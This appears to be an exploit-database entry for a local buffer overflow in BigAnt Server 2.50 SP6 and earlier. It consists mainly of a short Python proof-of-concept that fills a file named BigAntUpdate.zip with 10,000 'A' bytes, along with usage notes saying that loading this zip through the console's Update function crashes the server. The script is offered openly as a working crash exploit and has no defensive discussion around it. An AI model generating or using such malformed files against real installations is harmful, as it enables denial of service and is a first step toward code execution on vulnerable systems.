BigAnt server versions 2.50 SP6 and below local buffer overflow exploit that creates a malicious .zip file.
5813e89ab8bc82f20379574b3e3bb253#!/usr/bin/env python
########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Update, Add our zip, Boom.
#
########################################################################
buff = ("\x41" * 10000)
f1 = open("BigAntUpdate.zip","w")
f1.write(buff)
f1.close()
Comments
No comments yet, be the first!